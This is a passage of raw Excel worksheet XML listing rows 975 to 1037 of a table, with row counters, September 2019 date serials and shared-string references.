      </c>
      <c r="F975" t="s">
        <v>10526</v>
      </c>
      <c r="G975" t="s">
        <v>1946</v>
      </c>
    </row>
    <row r="976" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A976">
        <f t="shared" si="15"/>
        <v>975</v>
      </c>
      <c r="B976">
        <v>975</v>
      </c>
      <c r="C976" t="s">
        <v>3</v>
      </c>
      <c r="D976" s="1">
        <v>43721</v>
      </c>
      <c r="E976" t="s">
        <v>1947</v>
      </c>
      <c r="F976" t="s">
        <v>9975</v>
      </c>
      <c r="G976" t="s">
        <v>1948</v>
      </c>
    </row>
    <row r="977" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A977">
        <f t="shared" si="15"/>
        <v>976</v>
      </c>
      <c r="B977">
        <v>976</v>
      </c>
      <c r="C977" t="s">
        <v>3</v>
      </c>
      <c r="D977" s="1">
        <v>43714</v>
      </c>
      <c r="E977" t="s">
        <v>1949</v>
      </c>
      <c r="F977" t="s">
        <v>9975</v>
      </c>
      <c r="G977" t="s">
        <v>1950</v>
      </c>
    </row>
    <row r="978" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A978">
        <f t="shared" si="15"/>
        <v>977</v>
      </c>
      <c r="B978">
        <v>977</v>
      </c>
      <c r="C978" t="s">
        <v>3</v>
      </c>
      <c r="D978" s="1">
        <v>43725</v>
      </c>
      <c r="E978" t="s">
        <v>1951</v>
      </c>
      <c r="F978" t="s">
        <v>9975</v>
      </c>
      <c r="G978" t="s">
        <v>1952</v>
      </c>
    </row>
    <row r="979" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A979">
        <f t="shared" si="15"/>
        <v>978</v>
      </c>
      <c r="B979">
        <v>978</v>
      </c>
      <c r="C979" t="s">
        <v>3</v>
      </c>
      <c r="D979" s="1">
        <v>43733</v>
      </c>
      <c r="E979" t="s">
        <v>1953</v>
      </c>
      <c r="F979" t="s">
        <v>9975</v>
      </c>
      <c r="G979" t="s">
        <v>1954</v>
      </c>
    </row>
    <row r="980" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A980">
        <f t="shared" si="15"/>
        <v>979</v>
      </c>
      <c r="B980">
        <v>979</v>
      </c>
      <c r="C980" t="s">
        <v>3</v>
      </c>
      <c r="D980" s="1">
        <v>43714</v>
      </c>
      <c r="E980" t="s">
        <v>1955</v>
      </c>
      <c r="F980" t="s">
        <v>9978</v>
      </c>
      <c r="G980" t="s">
        <v>1956</v>
      </c>
    </row>
    <row r="981" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A981">
        <f t="shared" si="15"/>
        <v>980</v>
      </c>
      <c r="B981">
        <v>980</v>
      </c>
      <c r="C981" t="s">
        <v>3</v>
      </c>
      <c r="D981" s="1">
        <v>43733</v>
      </c>
      <c r="E981" t="s">
        <v>1957</v>
      </c>
      <c r="F981" t="s">
        <v>10021</v>
      </c>
      <c r="G981" t="s">
        <v>1958</v>
      </c>
    </row>
    <row r="982" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A982">
        <f t="shared" si="15"/>
        <v>981</v>
      </c>
      <c r="B982">
        <v>981</v>
      </c>
      <c r="C982" t="s">
        <v>3</v>
      </c>
      <c r="D982" s="1">
        <v>43729</v>
      </c>
      <c r="E982" t="s">
        <v>1959</v>
      </c>
      <c r="F982" t="s">
        <v>10021</v>
      </c>
      <c r="G982" t="s">
        <v>1960</v>
      </c>
    </row>
    <row r="983" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A983">
        <f t="shared" si="15"/>
        <v>982</v>
      </c>
      <c r="B983">
        <v>982</v>
      </c>
      <c r="C983" t="s">
        <v>3</v>
      </c>
      <c r="D983" s="1">
        <v>43727</v>
      </c>
      <c r="E983" t="s">
        <v>1961</v>
      </c>
      <c r="F983" t="s">
        <v>9978</v>
      </c>
      <c r="G983" t="s">
        <v>1962</v>
      </c>
    </row>
    <row r="984" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A984">
        <f t="shared" si="15"/>
        <v>983</v>
      </c>
      <c r="B984">
        <v>983</v>
      </c>
      <c r="C984" t="s">
        <v>3</v>
      </c>
      <c r="D984" s="1">
        <v>43732</v>
      </c>
      <c r="E984" t="s">
        <v>1963</v>
      </c>
      <c r="F984" t="s">
        <v>10526</v>
      </c>
      <c r="G984" t="s">
        <v>1964</v>
      </c>
    </row>
    <row r="985" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A985">
        <f t="shared" si="15"/>
        <v>984</v>
      </c>
      <c r="B985">
        <v>984</v>
      </c>
      <c r="C985" t="s">
        <v>3</v>
      </c>
      <c r="D985" s="1">
        <v>43716</v>
      </c>
      <c r="E985" t="s">
        <v>1965</v>
      </c>
      <c r="F985" t="s">
        <v>9975</v>
      </c>
      <c r="G985" t="s">
        <v>1966</v>
      </c>
    </row>
    <row r="986" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A986">
        <f t="shared" si="15"/>
        <v>985</v>
      </c>
      <c r="B986">
        <v>985</v>
      </c>
      <c r="C986" t="s">
        <v>3</v>
      </c>
      <c r="D986" s="1">
        <v>43714</v>
      </c>
      <c r="E986" t="s">
        <v>1967</v>
      </c>
      <c r="F986" t="s">
        <v>10021</v>
      </c>
      <c r="G986" t="s">
        <v>1968</v>
      </c>
    </row>
    <row r="987" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A987">
        <f t="shared" si="15"/>
        <v>986</v>
      </c>
      <c r="B987">
        <v>986</v>
      </c>
      <c r="C987" t="s">
        <v>3</v>
      </c>
      <c r="D987" s="1">
        <v>43712</v>
      </c>
      <c r="E987" t="s">
        <v>1969</v>
      </c>
      <c r="F987" t="s">
        <v>9975</v>
      </c>
      <c r="G987" t="s">
        <v>1970</v>
      </c>
    </row>
    <row r="988" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A988">
        <f t="shared" si="15"/>
        <v>987</v>
      </c>
      <c r="B988">
        <v>987</v>
      </c>
      <c r="C988" t="s">
        <v>3</v>
      </c>
      <c r="D988" s="1">
        <v>43736</v>
      </c>
      <c r="E988" t="s">
        <v>1971</v>
      </c>
      <c r="F988" t="s">
        <v>9975</v>
      </c>
      <c r="G988" t="s">
        <v>1972</v>
      </c>
    </row>
    <row r="989" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A989">
        <f t="shared" si="15"/>
        <v>988</v>
      </c>
      <c r="B989">
        <v>988</v>
      </c>
      <c r="C989" t="s">
        <v>3</v>
      </c>
      <c r="D989" s="1">
        <v>43733</v>
      </c>
      <c r="E989" t="s">
        <v>1973</v>
      </c>
      <c r="F989" t="s">
        <v>10021</v>
      </c>
      <c r="G989" t="s">
        <v>1974</v>
      </c>
    </row>
    <row r="990" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A990">
        <f t="shared" si="15"/>
        <v>989</v>
      </c>
      <c r="B990">
        <v>989</v>
      </c>
      <c r="C990" t="s">
        <v>3</v>
      </c>
      <c r="D990" s="1">
        <v>43727</v>
      </c>
      <c r="E990" t="s">
        <v>1975</v>
      </c>
      <c r="F990" t="s">
        <v>9975</v>
      </c>
      <c r="G990" t="s">
        <v>1976</v>
      </c>
    </row>
    <row r="991" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A991">
        <f t="shared" si="15"/>
        <v>990</v>
      </c>
      <c r="B991">
        <v>990</v>
      </c>
      <c r="C991" t="s">
        <v>3</v>
      </c>
      <c r="D991" s="1">
        <v>43733</v>
      </c>
      <c r="E991" t="s">
        <v>1977</v>
      </c>
      <c r="F991" t="s">
        <v>10526</v>
      </c>
      <c r="G991" t="s">
        <v>1978</v>
      </c>
    </row>
    <row r="992" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A992">
        <f t="shared" si="15"/>
        <v>991</v>
      </c>
      <c r="B992">
        <v>991</v>
      </c>
      <c r="C992" t="s">
        <v>3</v>
      </c>
      <c r="D992" s="1">
        <v>43724</v>
      </c>
      <c r="E992" t="s">
        <v>1979</v>
      </c>
      <c r="F992" t="s">
        <v>9975</v>
      </c>
      <c r="G992" t="s">
        <v>1980</v>
      </c>
    </row>
    <row r="993" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A993">
        <f t="shared" si="15"/>
        <v>992</v>
      </c>
      <c r="B993">
        <v>992</v>
      </c>
      <c r="C993" t="s">
        <v>3</v>
      </c>
      <c r="D993" s="1">
        <v>43726</v>
      </c>
      <c r="E993" t="s">
        <v>1981</v>
      </c>
      <c r="F993" t="s">
        <v>9975</v>
      </c>
      <c r="G993" t="s">
        <v>1982</v>
      </c>
    </row>
    <row r="994" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A994">
        <f t="shared" si="15"/>
        <v>993</v>
      </c>
      <c r="B994">
        <v>993</v>
      </c>
      <c r="C994" t="s">
        <v>3</v>
      </c>
      <c r="D994" s="1">
        <v>43723</v>
      </c>
      <c r="E994" t="s">
        <v>1983</v>
      </c>
      <c r="F994" t="s">
        <v>10021</v>
      </c>
      <c r="G994" t="s">
        <v>1984</v>
      </c>
    </row>
    <row r="995" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A995">
        <f t="shared" si="15"/>
        <v>994</v>
      </c>
      <c r="B995">
        <v>994</v>
      </c>
      <c r="C995" t="s">
        <v>3</v>
      </c>
      <c r="D995" s="1">
        <v>43733</v>
      </c>
      <c r="E995" t="s">
        <v>1985</v>
      </c>
      <c r="F995" t="s">
        <v>9975</v>
      </c>
      <c r="G995" t="s">
        <v>1986</v>
      </c>
    </row>
    <row r="996" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A996">
        <f t="shared" si="15"/>
        <v>995</v>
      </c>
      <c r="B996">
        <v>995</v>
      </c>
      <c r="C996" t="s">
        <v>3</v>
      </c>
      <c r="D996" s="1">
        <v>43733</v>
      </c>
      <c r="E996" t="s">
        <v>1987</v>
      </c>
      <c r="F996" t="s">
        <v>10021</v>
      </c>
      <c r="G996" t="s">
        <v>1988</v>
      </c>
    </row>
    <row r="997" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A997">
        <f t="shared" si="15"/>
        <v>996</v>
      </c>
      <c r="B997">
        <v>996</v>
      </c>
      <c r="C997" t="s">
        <v>3</v>
      </c>
      <c r="D997" s="1">
        <v>43732</v>
      </c>
      <c r="E997" t="s">
        <v>1989</v>
      </c>
      <c r="F997" t="s">
        <v>9975</v>
      </c>
      <c r="G997" t="s">
        <v>1990</v>
      </c>
    </row>
    <row r="998" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A998">
        <f t="shared" si="15"/>
        <v>997</v>
      </c>
      <c r="B998">
        <v>997</v>
      </c>
      <c r="C998" t="s">
        <v>3</v>
      </c>
      <c r="D998" s="1">
        <v>43723</v>
      </c>
      <c r="E998" t="s">
        <v>1991</v>
      </c>
      <c r="F998" t="s">
        <v>9975</v>
      </c>
      <c r="G998" t="s">
        <v>1992</v>
      </c>
    </row>
    <row r="999" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A999">
        <f t="shared" si="15"/>
        <v>998</v>
      </c>
      <c r="B999">
        <v>998</v>
      </c>
      <c r="C999" t="s">
        <v>3</v>
      </c>
      <c r="D999" s="1">
        <v>43711</v>
      </c>
      <c r="E999" t="s">
        <v>1993</v>
      </c>
      <c r="F999" t="s">
        <v>9975</v>
      </c>
      <c r="G999" t="s">
        <v>1994</v>
      </c>
    </row>
    <row r="1000" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1000">
        <f t="shared" si="15"/>
        <v>999</v>
      </c>
      <c r="B1000">
        <v>999</v>
      </c>
      <c r="C1000" t="s">
        <v>3</v>
      </c>
      <c r="D1000" s="1">
        <v>43730</v>
      </c>
      <c r="E1000" t="s">
        <v>1995</v>
      </c>
      <c r="F1000" t="s">
        <v>9975</v>
      </c>
      <c r="G1000" t="s">
        <v>1996</v>
      </c>
    </row>
    <row r="1001" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1001">
        <f t="shared" si="15"/>
        <v>1000</v>
      </c>
      <c r="B1001">
        <v>1000</v>
      </c>
      <c r="C1001" t="s">
        <v>3</v>
      </c>
      <c r="D1001" s="1">
        <v>43732</v>
      </c>
      <c r="E1001" t="s">
        <v>1997</v>
      </c>
      <c r="F1001" t="s">
        <v>9975</v>
      </c>
      <c r="G1001" t="s">
        <v>1998</v>
      </c>
    </row>
    <row r="1002" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1002">
        <f t="shared" si="15"/>
        <v>1001</v>
      </c>
      <c r="B1002">
        <v>1001</v>
      </c>
      <c r="C1002" t="s">
        <v>3</v>
      </c>
      <c r="D1002" s="1">
        <v>43735</v>
      </c>
      <c r="E1002" t="s">
        <v>1999</v>
      </c>
      <c r="F1002" t="s">
        <v>9975</v>
      </c>
      <c r="G1002" t="s">
        <v>2000</v>
      </c>
    </row>
    <row r="1003" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1003">
        <f t="shared" si="15"/>
        <v>1002</v>
      </c>
      <c r="B1003">
        <v>1002</v>
      </c>
      <c r="C1003" t="s">
        <v>3</v>
      </c>
      <c r="D1003" s="1">
        <v>43728</v>
      </c>
      <c r="E1003" t="s">
        <v>2001</v>
      </c>
      <c r="F1003" t="s">
        <v>9975</v>
      </c>
      <c r="G1003" t="s">
        <v>2002</v>
      </c>
    </row>
    <row r="1004" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1004">
        <f t="shared" si="15"/>
        <v>1003</v>
      </c>
      <c r="B1004">
        <v>1003</v>
      </c>
      <c r="C1004" t="s">
        <v>3</v>
      </c>
      <c r="D1004" s="1">
        <v>43728</v>
      </c>
      <c r="E1004" t="s">
        <v>2003</v>
      </c>
      <c r="F1004" t="s">
        <v>9975</v>
      </c>
      <c r="G1004" t="s">
        <v>2004</v>
      </c>
    </row>
    <row r="1005" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1005">
        <f t="shared" si="15"/>
        <v>1004</v>
      </c>
      <c r="B1005">
        <v>1004</v>
      </c>
      <c r="C1005" t="s">
        <v>3</v>
      </c>
      <c r="D1005" s="1">
        <v>43734</v>
      </c>
      <c r="E1005" t="s">
        <v>2005</v>
      </c>
      <c r="F1005" t="s">
        <v>9975</v>
      </c>
      <c r="G1005" t="s">
        <v>2006</v>
      </c>
    </row>
    <row r="1006" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1006">
        <f t="shared" si="15"/>
        <v>1005</v>
      </c>
      <c r="B1006">
        <v>1005</v>
      </c>
      <c r="C1006" t="s">
        <v>3</v>
      </c>
      <c r="D1006" s="1">
        <v>43728</v>
      </c>
      <c r="E1006" t="s">
        <v>2007</v>
      </c>
      <c r="F1006" t="s">
        <v>10526</v>
      </c>
      <c r="G1006" t="s">
        <v>2008</v>
      </c>
    </row>
    <row r="1007" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1007">
        <f t="shared" si="15"/>
        <v>1006</v>
      </c>
      <c r="B1007">
        <v>1006</v>
      </c>
      <c r="C1007" t="s">
        <v>3</v>
      </c>
      <c r="D1007" s="1">
        <v>43711</v>
      </c>
      <c r="E1007" t="s">
        <v>2009</v>
      </c>
      <c r="F1007" t="s">
        <v>10021</v>
      </c>
      <c r="G1007" t="s">
        <v>2010</v>
      </c>
    </row>
    <row r="1008" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1008">
        <f t="shared" si="15"/>
        <v>1007</v>
      </c>
      <c r="B1008">
        <v>1007</v>
      </c>
      <c r="C1008" t="s">
        <v>3</v>
      </c>
      <c r="D1008" s="1">
        <v>43720</v>
      </c>
      <c r="E1008" t="s">
        <v>2011</v>
      </c>
      <c r="F1008" t="s">
        <v>9975</v>
      </c>
      <c r="G1008" t="s">
        <v>2012</v>
      </c>
    </row>
    <row r="1009" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1009">
        <f t="shared" si="15"/>
        <v>1008</v>
      </c>
      <c r="B1009">
        <v>1008</v>
      </c>
      <c r="C1009" t="s">
        <v>3</v>
      </c>
      <c r="D1009" s="1">
        <v>43728</v>
      </c>
      <c r="E1009" t="s">
        <v>2013</v>
      </c>
      <c r="F1009" t="s">
        <v>9975</v>
      </c>
      <c r="G1009" t="s">
        <v>2014</v>
      </c>
    </row>
    <row r="1010" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1010">
        <f t="shared" si="15"/>
        <v>1009</v>
      </c>
      <c r="B1010">
        <v>1009</v>
      </c>
      <c r="C1010" t="s">
        <v>3</v>
      </c>
      <c r="D1010" s="1">
        <v>43716</v>
      </c>
      <c r="E1010" t="s">
        <v>2015</v>
      </c>
      <c r="F1010" t="s">
        <v>9975</v>
      </c>
      <c r="G1010" t="s">
        <v>2016</v>
      </c>
    </row>
    <row r="1011" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1011">
        <f t="shared" si="15"/>
        <v>1010</v>
      </c>
      <c r="B1011">
        <v>1010</v>
      </c>
      <c r="C1011" t="s">
        <v>3</v>
      </c>
      <c r="D1011" s="1">
        <v>43723</v>
      </c>
      <c r="E1011" t="s">
        <v>2017</v>
      </c>
      <c r="F1011" t="s">
        <v>9975</v>
      </c>
      <c r="G1011" t="s">
        <v>2018</v>
      </c>
    </row>
    <row r="1012" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1012">
        <f t="shared" si="15"/>
        <v>1011</v>
      </c>
      <c r="B1012">
        <v>1011</v>
      </c>
      <c r="C1012" t="s">
        <v>3</v>
      </c>
      <c r="D1012" s="1">
        <v>43712</v>
      </c>
      <c r="E1012" t="s">
        <v>2019</v>
      </c>
      <c r="F1012" t="s">
        <v>9975</v>
      </c>
      <c r="G1012" t="s">
        <v>2020</v>
      </c>
    </row>
    <row r="1013" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1013">
        <f t="shared" si="15"/>
        <v>1012</v>
      </c>
      <c r="B1013">
        <v>1012</v>
      </c>
      <c r="C1013" t="s">
        <v>3</v>
      </c>
      <c r="D1013" s="1">
        <v>43712</v>
      </c>
      <c r="E1013" t="s">
        <v>2021</v>
      </c>
      <c r="F1013" t="s">
        <v>9975</v>
      </c>
      <c r="G1013" t="s">
        <v>2022</v>
      </c>
    </row>
    <row r="1014" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1014">
        <f t="shared" si="15"/>
        <v>1013</v>
      </c>
      <c r="B1014">
        <v>1013</v>
      </c>
      <c r="C1014" t="s">
        <v>3</v>
      </c>
      <c r="D1014" s="1">
        <v>43724</v>
      </c>
      <c r="E1014" t="s">
        <v>2023</v>
      </c>
      <c r="F1014" t="s">
        <v>9975</v>
      </c>
      <c r="G1014" t="s">
        <v>2024</v>
      </c>
    </row>
    <row r="1015" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1015">
        <f t="shared" si="15"/>
        <v>1014</v>
      </c>
      <c r="B1015">
        <v>1014</v>
      </c>
      <c r="C1015" t="s">
        <v>3</v>
      </c>
      <c r="D1015" s="1">
        <v>43715</v>
      </c>
      <c r="E1015" t="s">
        <v>2025</v>
      </c>
      <c r="F1015" t="s">
        <v>9978</v>
      </c>
      <c r="G1015" t="s">
        <v>2026</v>
      </c>
    </row>
    <row r="1016" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1016">
        <f t="shared" si="15"/>
        <v>1015</v>
      </c>
      <c r="B1016">
        <v>1015</v>
      </c>
      <c r="C1016" t="s">
        <v>3</v>
      </c>
      <c r="D1016" s="1">
        <v>43733</v>
      </c>
      <c r="E1016" t="s">
        <v>2027</v>
      </c>
      <c r="F1016" t="s">
        <v>9975</v>
      </c>
      <c r="G1016" t="s">
        <v>2028</v>
      </c>
    </row>
    <row r="1017" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1017">
        <f t="shared" si="15"/>
        <v>1016</v>
      </c>
      <c r="B1017">
        <v>1016</v>
      </c>
      <c r="C1017" t="s">
        <v>3</v>
      </c>
      <c r="D1017" s="1">
        <v>43735</v>
      </c>
      <c r="E1017" t="s">
        <v>2029</v>
      </c>
      <c r="F1017" t="s">
        <v>9975</v>
      </c>
      <c r="G1017" t="s">
        <v>2030</v>
      </c>
    </row>
    <row r="1018" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1018">
        <f t="shared" si="15"/>
        <v>1017</v>
      </c>
      <c r="B1018">
        <v>1017</v>
      </c>
      <c r="C1018" t="s">
        <v>3</v>
      </c>
      <c r="D1018" s="1">
        <v>43719</v>
      </c>
      <c r="E1018" t="s">
        <v>2031</v>
      </c>
      <c r="F1018" t="s">
        <v>9975</v>
      </c>
      <c r="G1018" t="s">
        <v>2032</v>
      </c>
    </row>
    <row r="1019" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1019">
        <f t="shared" si="15"/>
        <v>1018</v>
      </c>
      <c r="B1019">
        <v>1018</v>
      </c>
      <c r="C1019" t="s">
        <v>3</v>
      </c>
      <c r="D1019" s="1">
        <v>43733</v>
      </c>
      <c r="E1019" t="s">
        <v>2033</v>
      </c>
      <c r="F1019" t="s">
        <v>9975</v>
      </c>
      <c r="G1019" t="s">
        <v>2034</v>
      </c>
    </row>
    <row r="1020" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1020">
        <f t="shared" si="15"/>
        <v>1019</v>
      </c>
      <c r="B1020">
        <v>1019</v>
      </c>
      <c r="C1020" t="s">
        <v>3</v>
      </c>
      <c r="D1020" s="1">
        <v>43726</v>
      </c>
      <c r="E1020" t="s">
        <v>2035</v>
      </c>
      <c r="F1020" t="s">
        <v>9978</v>
      </c>
      <c r="G1020" t="s">
        <v>2036</v>
      </c>
    </row>
    <row r="1021" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1021">
        <f t="shared" si="15"/>
        <v>1020</v>
      </c>
      <c r="B1021">
        <v>1020</v>
      </c>
      <c r="C1021" t="s">
        <v>3</v>
      </c>
      <c r="D1021" s="1">
        <v>43726</v>
      </c>
      <c r="E1021" t="s">
        <v>2037</v>
      </c>
      <c r="F1021" t="s">
        <v>10526</v>
      </c>
      <c r="G1021" t="s">
        <v>2038</v>
      </c>
    </row>
    <row r="1022" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1022">
        <f t="shared" si="15"/>
        <v>1021</v>
      </c>
      <c r="B1022">
        <v>1021</v>
      </c>
      <c r="C1022" t="s">
        <v>3</v>
      </c>
      <c r="D1022" s="1">
        <v>43710</v>
      </c>
      <c r="E1022" t="s">
        <v>2039</v>
      </c>
      <c r="F1022" t="s">
        <v>10021</v>
      </c>
      <c r="G1022" t="s">
        <v>2040</v>
      </c>
    </row>
    <row r="1023" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1023">
        <f t="shared" si="15"/>
        <v>1022</v>
      </c>
      <c r="B1023">
        <v>1022</v>
      </c>
      <c r="C1023" t="s">
        <v>3</v>
      </c>
      <c r="D1023" s="1">
        <v>43738</v>
      </c>
      <c r="E1023" t="s">
        <v>2041</v>
      </c>
      <c r="F1023" t="s">
        <v>9975</v>
      </c>
      <c r="G1023" t="s">
        <v>2042</v>
      </c>
    </row>
    <row r="1024" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1024">
        <f t="shared" si="15"/>
        <v>1023</v>
      </c>
      <c r="B1024">
        <v>1023</v>
      </c>
      <c r="C1024" t="s">
        <v>3</v>
      </c>
      <c r="D1024" s="1">
        <v>43731</v>
      </c>
      <c r="E1024" t="s">
        <v>2043</v>
      </c>
      <c r="F1024" t="s">
        <v>9975</v>
      </c>
      <c r="G1024" t="s">
        <v>2044</v>
      </c>
    </row>
    <row r="1025" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1025">
        <f t="shared" si="15"/>
        <v>1024</v>
      </c>
      <c r="B1025">
        <v>1024</v>
      </c>
      <c r="C1025" t="s">
        <v>3</v>
      </c>
      <c r="D1025" s="1">
        <v>43714</v>
      </c>
      <c r="E1025" t="s">
        <v>2045</v>
      </c>
      <c r="F1025" t="s">
        <v>9975</v>
      </c>
      <c r="G1025" t="s">
        <v>2046</v>
      </c>
    </row>
    <row r="1026" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1026">
        <f t="shared" si="15"/>
        <v>1025</v>
      </c>
      <c r="B1026">
        <v>1025</v>
      </c>
      <c r="C1026" t="s">
        <v>3</v>
      </c>
      <c r="D1026" s="1">
        <v>43731</v>
      </c>
      <c r="E1026" t="s">
        <v>2047</v>
      </c>
      <c r="F1026" t="s">
        <v>9978</v>
      </c>
      <c r="G1026" t="s">
        <v>2048</v>
      </c>
    </row>
    <row r="1027" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1027">
        <f t="shared" ref="A1027:A1090" si="16">+ROW(A1026)</f>
        <v>1026</v>
      </c>
      <c r="B1027">
        <v>1026</v>
      </c>
      <c r="C1027" t="s">
        <v>3</v>
      </c>
      <c r="D1027" s="1">
        <v>43722</v>
      </c>
      <c r="E1027" t="s">
        <v>2049</v>
      </c>
      <c r="F1027" t="s">
        <v>9975</v>
      </c>
      <c r="G1027" t="s">
        <v>2050</v>
      </c>
    </row>
    <row r="1028" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1028">
        <f t="shared" si="16"/>
        <v>1027</v>
      </c>
      <c r="B1028">
        <v>1027</v>
      </c>
      <c r="C1028" t="s">
        <v>3</v>
      </c>
      <c r="D1028" s="1">
        <v>43738</v>
      </c>
      <c r="E1028" t="s">
        <v>2051</v>
      </c>
      <c r="F1028" t="s">
        <v>9975</v>
      </c>
      <c r="G1028" t="s">
        <v>2052</v>
      </c>
    </row>
    <row r="1029" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1029">
        <f t="shared" si="16"/>
        <v>1028</v>
      </c>
      <c r="B1029">
        <v>1028</v>
      </c>
      <c r="C1029" t="s">
        <v>3</v>
      </c>
      <c r="D1029" s="1">
        <v>43720</v>
      </c>
      <c r="E1029" t="s">
        <v>2053</v>
      </c>
      <c r="F1029" t="s">
        <v>9975</v>
      </c>
      <c r="G1029" t="s">
        <v>2054</v>
      </c>
    </row>
    <row r="1030" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1030">
        <f t="shared" si="16"/>
        <v>1029</v>
      </c>
      <c r="B1030">
        <v>1029</v>
      </c>
      <c r="C1030" t="s">
        <v>3</v>
      </c>
      <c r="D1030" s="1">
        <v>43731</v>
      </c>
      <c r="E1030" t="s">
        <v>2055</v>
      </c>
      <c r="F1030" t="s">
        <v>9975</v>
      </c>
      <c r="G1030" t="s">
        <v>2056</v>
      </c>
    </row>
    <row r="1031" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1031">
        <f t="shared" si="16"/>
        <v>1030</v>
      </c>
      <c r="B1031">
        <v>1030</v>
      </c>
      <c r="C1031" t="s">
        <v>3</v>
      </c>
      <c r="D1031" s="1">
        <v>43730</v>
      </c>
      <c r="E1031" t="s">
        <v>2057</v>
      </c>
      <c r="F1031" t="s">
        <v>9975</v>
      </c>
      <c r="G1031" t="s">
        <v>2058</v>
      </c>
    </row>
    <row r="1032" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1032">
        <f t="shared" si="16"/>
        <v>1031</v>
      </c>
      <c r="B1032">
        <v>1031</v>
      </c>
      <c r="C1032" t="s">
        <v>3</v>
      </c>
      <c r="D1032" s="1">
        <v>43714</v>
      </c>
      <c r="E1032" t="s">
        <v>2059</v>
      </c>
      <c r="F1032" t="s">
        <v>9975</v>
      </c>
      <c r="G1032" t="s">
        <v>2060</v>
      </c>
    </row>
    <row r="1033" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1033">
        <f t="shared" si="16"/>
        <v>1032</v>
      </c>
      <c r="B1033">
        <v>1032</v>
      </c>
      <c r="C1033" t="s">
        <v>3</v>
      </c>
      <c r="D1033" s="1">
        <v>43722</v>
      </c>
      <c r="E1033" t="s">
        <v>2061</v>
      </c>
      <c r="F1033" t="s">
        <v>10526</v>
      </c>
      <c r="G1033" t="s">
        <v>2062</v>
      </c>
    </row>
    <row r="1034" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1034">
        <f t="shared" si="16"/>
        <v>1033</v>
      </c>
      <c r="B1034">
        <v>1033</v>
      </c>
      <c r="C1034" t="s">
        <v>3</v>
      </c>
      <c r="D1034" s="1">
        <v>43730</v>
      </c>
      <c r="E1034" t="s">
        <v>2063</v>
      </c>
      <c r="F1034" t="s">
        <v>9975</v>
      </c>
      <c r="G1034" t="s">
        <v>2064</v>
      </c>
    </row>
    <row r="1035" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1035">
        <f t="shared" si="16"/>
        <v>1034</v>
      </c>
      <c r="B1035">
        <v>1034</v>
      </c>
      <c r="C1035" t="s">
        <v>3</v>
      </c>
      <c r="D1035" s="1">
        <v>43720</v>
      </c>
      <c r="E1035" t="s">
        <v>2065</v>
      </c>
      <c r="F1035" t="s">
        <v>9978</v>
      </c>
      <c r="G1035" t="s">
        <v>2066</v>
      </c>
    </row>
    <row r="1036" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1036">
        <f t="shared" si="16"/>
        <v>1035</v>
      </c>
      <c r="B1036">
        <v>1035</v>
      </c>
      <c r="C1036" t="s">
        <v>3</v>
      </c>
      <c r="D1036" s="1">
        <v>43712</v>
      </c>
      <c r="E1036" t="s">
        <v>2067</v>
      </c>
      <c r="F1036" t="s">
        <v>10021</v>
      </c>
      <c r="G1036" t="s">
        <v>2068</v>
      </c>
    </row>
    <row r="1037" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A1037">
        <f t="shared" si="16"/>
        <v>1036</v>
      </c>
      <c r="B1037">
        <v>1036</v>
      </c>
      <c r="C1037" t="s">
        <v>3</v>
      </c>
      <c r="D1037" s="1">
        <v>43721</v>
      </c>
      <c r="E1037" t="s">
        <v>2069</v>
      </c>
      <c r="F1037" t="s">
        <v>9975</v>
